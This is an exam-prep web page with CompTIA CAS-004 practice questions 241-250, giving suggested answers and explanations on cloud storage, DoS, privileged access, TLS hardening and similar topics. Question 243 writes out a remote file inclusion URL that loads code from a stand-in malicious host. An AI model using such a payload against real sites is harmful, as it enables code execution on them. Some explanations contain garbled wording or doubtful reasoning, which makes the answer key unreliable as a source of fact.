ExamGecko
Home / CompTIA / CAS-004 / List of questions
Ask Question

CompTIA CAS-004 Practice Test - Questions Answers, Page 25

List of questions

Question 241

Report Export Collapse

A company hosts a large amount of data in blob storage for its customers. The company recently had a number of issues with this data being prematurely deleted before the scheduled backup processes could be completed. The management team has asked the security architect for a recommendation that allows blobs to be deleted occasionally, but only after a successful backup. Which of the following solutions will BEST meet this requirement?

Mirror the blobs at a local data center.
Mirror the blobs at a local data center.
Enable fast recovery on the storage account.
Enable fast recovery on the storage account.
Implement soft delete for blobs.
Implement soft delete for blobs.
Make the blob immutable.
Make the blob immutable.
Suggested answer: C
Explanation:

Soft delete allows blobs to be deleted, but the data remains accessible for a period of time before it is permanently deleted. This allows the company to delete blobs as needed, while still affording enough time for the backup process to complete. After the backup process is complete, the blobs can be permanently deleted.

asked 02/10/2024
ajay jaiswal
41 questions

Question 242

Report Export Collapse

Users are claiming that a web server is not accessible. A security engineer logs for the site. The engineer connects to the server and runs netstat -an and receives the following output:

CompTIA CAS-004 image Question 242 94210 10022024175035000000

Port scanning
Port scanning
ARP spoofing
ARP spoofing
Buffer overflow
Buffer overflow
Denial of service
Denial of service
Suggested answer: D
Explanation:

A denial of service (DoS) attack is a malicious attempt to disrupt the normal functioning of a server by overwhelming it with requests or traffic1.One possible indicator of a DoS attack is a large number of connections from a single source IP address1.In this case, the output of netstat -an shows that there are many connections from 213.37.55.67 with different port numbers and in TIME WAIT state23.This suggests that the attacker is sending many SYN packets to initiate connections but not completing them, thus exhausting the server's resources and preventing legitimate users from accessing it1.

asked 02/10/2024
Michael Whitehouse
52 questions

Question 243

Report Export Collapse

A security engineer notices the company website allows users following example:

hitps://mycompany.com/main.php?Country=US

Which of the following vulnerabilities would MOST likely affect this site?

SQL injection
SQL injection
Remote file inclusion
Remote file inclusion
Directory traversal -
Directory traversal -
Unsecure references
Unsecure references
Suggested answer: B
Explanation:

Remote file inclusion (RFI) is a web vulnerability that allows an attacker to include malicious external files that are later run by the website or web application12. This can lead to code execution, data theft, defacement, or other malicious actions.RFI typically occurs when a web application dynamically references external scripts using user-supplied input without proper validation or sanitization23.

In this case, the website allows users to specify a country parameter in the URL that is used to include a file from another domain. For example, an attacker could craft a URL like this:

https://mycompany.com/main.php?Country=https://malicious.com/evil.php

This would cause the website to include and execute the evil.php file from the malicious domain, which could contain any arbitrary code3.

asked 02/10/2024
Musoke Kamuzze
33 questions

Question 244

Report Export Collapse

city government's IT director was notified by the City council that the following cybersecurity requirements must be met to be awarded a large federal grant:

+ Logs for all critical devices must be retained for 365 days to enable monitoring and threat hunting.

+ All privileged user access must be tightly controlled and tracked to mitigate compromised accounts.

+ Ransomware threats and zero-day vulnerabilities must be quickly identified.

Which of the following technologies would BEST satisfy these requirements? (Select THREE).

Endpoint protection
Endpoint protection
Log aggregator
Log aggregator
Zero trust network access
Zero trust network access
PAM
PAM
Cloud sandbox
Cloud sandbox
SIEM
SIEM
NGFW
NGFW
Suggested answer: B, D, F
Explanation:

B) Log aggregator: A log aggregator is a tool that collects, parses, and stores logs from various sources, such as devices, applications, servers, etc.A log aggregator can help meet the requirement of retaining logs for 365 days by providing a centralized and scalable storage solution1.

D) PAM: PAM stands for privileged access management. It is a technology that controls and monitors the access of privileged users (such as administrators) to critical systems and data. PAM can help meet the requirement of controlling and tracking privileged user access by enforcing policies such as least privilege, multifactor authentication, password rotation, session recording, etc. .

F) SIEM: SIEM stands for security information and event management. It is a technology that analyzes and correlates logs from various sources to detect and respond to security incidents. SIEM can help meet the requirement of identifying ransomware threats and zero-day vulnerabilities by providing real-time alerts, threat intelligence feeds, incident response workflows, etc. .


asked 02/10/2024
Rahul Biradavolu
43 questions

Question 245

Report Export Collapse

A security architect is designing a solution for a new customer who requires significant security capabilities in its environment. The customer has provided the architect with the following set of requirements:

* Capable of early detection of advanced persistent threats.

* Must be transparent to users and cause no performance degradation.

+ Allow integration with production and development networks seamlessly.

+ Enable the security team to hunt and investigate live exploitation techniques.

Which of the following technologies BEST meets the customer's requirements for security capabilities?

Threat Intelligence
Threat Intelligence
Deception software
Deception software
Centralized logging
Centralized logging
Sandbox detonation
Sandbox detonation
Suggested answer: B
Explanation:

Deception software is a technology that creates realistic but fake assets (such as servers, applications, data, etc.) that mimic the real environment and lure attackers into interacting with them.By doing so, deception software can help detect advanced persistent threats (APTs) that may otherwise evade traditional security tools12.Deception software can also provide valuable insights into the attacker's tactics, techniques, and procedures (TTPs) by capturing their actions and behaviors on the decoys13.

Deception software can meet the customer's requirements for security capabilities because:

It is capable of early detection of APTs by creating attractive targets for them and alerting security teams when they are engaged12.

It is transparent to users and causes no performance degradation because it does not interfere with legitimate traffic or resources13.

It allows integration with production and development networks seamlessly because it can create decoys that match the network topology and configuration13.

It enables the security team to hunt and investigate live exploitation techniques because it can record and analyze the attacker's activities on the decoys13.

asked 02/10/2024
Craig Reid
38 questions

Question 246

Report Export Collapse

A software development company is building a new mobile application for its social media platform. The company wants to gain its users' trust by re reducing the risk of on-path attacks between the mobile client and its servers and

by implementing stronger digital trust. To support users' trust, the company has released the following internal guidelines:

* Mobile clients should verify the identity of all social media servers locally.

* Social media servers should improve TLS performance of their certificate status.

+ Social media servers should inform the client to only use HTTPS.

Given the above requirements, which of the following should the company implement? (Select TWO).

Quick UDP internet connection
Quick UDP internet connection
OCSP stapling
OCSP stapling
Private CA
Private CA
DNSSEC
DNSSEC
CRL
CRL
HSTS
HSTS
Distributed object model
Distributed object model
Suggested answer: B, F
Explanation:

OCSP stapling and HSTS are the best options to meet the requirements of reducing the risk of on-path attacks and implementing stronger digital trust. OCSP stapling allows the social media servers to improve TLS performance by sending a signed certificate status along with the certificate, eliminating the need for the client to contact the CA separately. HSTS allows the social media servers to inform the client to only use HTTPS and prevent downgrade attacks.The other options are either irrelevant or less effective for the given scenario.

asked 02/10/2024
Arndt Langer
46 questions

Question 247

Report Export Collapse

During a phishing exercise, a few privileged users ranked high on the failure list. The enterprise would like to ensure that privileged users have an extra security-monitoring control in place. Which of the following Is the MOST

likely solution?

A WAF to protect web traffic
A WAF to protect web traffic
User and entity behavior analytics
User and entity behavior analytics
Requirements to change the local password
Requirements to change the local password
A gap analysis
A gap analysis
Suggested answer: B
Explanation:

User and entity behavior analytics (UEBA) is the best solution to monitor and detect unusual or malicious activity by privileged users who failed the phishing exercise. UEBA uses machine learning and behavioral analytics to establish a baseline of normal activity and identify anomalies that indicate potential threats. UEBA can help detect compromised credentials, insider threats, and advanced persistent threats that may evade traditional security solutions.The other options are either irrelevant or less effective for the given scenario.

asked 02/10/2024
Ludovic HEZON
34 questions

Question 248

Report Export Collapse

Users are reporting intermittent access issues with & new cloud application that was recently added to the network. Upon investigation, he scary administrator notices the human resources department Is able to run required queries with the new application, but the marketing department is unable to pull any needed reports on various resources using the new application. Which of the following MOST likely needs to be done to avoid this in the future?

Modify the ACLs.
Modify the ACLs.
Review the Active Directory.
Review the Active Directory.
Update the marketing department's browser.
Update the marketing department's browser.
Reconfigure the WAF.
Reconfigure the WAF.
Suggested answer: A
Explanation:

Modifying the ACLs (access control lists) is the most likely solution to avoid the intermittent access issues with the new cloud application. ACLs are used to define permissions for different users and groups to access resources on a network. The problem may be caused by incorrect or missing ACLs for the marketing department that prevent them from accessing the cloud application or its data sources.The other options are either irrelevant or less effective for the given scenario

asked 02/10/2024
Oscar Luis Garza Ruiz
42 questions

Question 249

Report Export Collapse

A security administrator has been tasked with hardening a domain controller against lateral movement attacks. Below is an output of running services:

CompTIA CAS-004 image Question 249 94217 10022024175035000000

Which of the following configuration changes must be made to complete this task?

Stop the Print Spooler service and set the startup type to disabled.
Stop the Print Spooler service and set the startup type to disabled.
Stop the DNS Server service and set the startup type to disabled.
Stop the DNS Server service and set the startup type to disabled.
Stop the Active Directory Web Services service and set the startup type to disabled.
Stop the Active Directory Web Services service and set the startup type to disabled.
Stop Credential Manager service and leave the startup type to disabled.
Stop Credential Manager service and leave the startup type to disabled.
Suggested answer: A
Explanation:

Stopping the Print Spooler service and setting the startup type to disabled is the best configuration change to harden a domain controller against lateral movement attacks. The Print Spooler service has been known to be vulnerable to remote code execution exploits that can allow attackers to gain access to domain controllers and other sensitive machines. Disabling this service can reduce the attack surface and prevent exploitation attempts.

asked 02/10/2024
Panayiotis Markatos
54 questions

Question 250

Report Export Collapse

An architectural firm is working with its security team to ensure that any draft images that are leaked to the public can be traced back to a specific external party. Which of the following would BEST accomplish this goal?

Properly configure a secure file transfer system to ensure file integrity.
Properly configure a secure file transfer system to ensure file integrity.
Have the external parties sign non-disclosure agreements before sending any images.
Have the external parties sign non-disclosure agreements before sending any images.
Only share images with external parties that have worked with the firm previously.
Only share images with external parties that have worked with the firm previously.
Utilize watermarks in the images that are specific to each external party.
Utilize watermarks in the images that are specific to each external party.
Suggested answer: D
Explanation:

Utilizing watermarks in the images that are specific to each external party would best accomplish the goal of tracing back any leaked draft images. Watermarks are visible or invisible marks that can be embedded in digital images to indicate ownership, authenticity, or origin. Watermarks can also be used to identify the recipient of the image and deter unauthorized copying or distribution. If a draft image is leaked to the public, the watermark can reveal which external party was responsible for the breach.

asked 02/10/2024
Newton Vela
46 questions
Total 564 questions
Go to page: of 57
Search

Related questions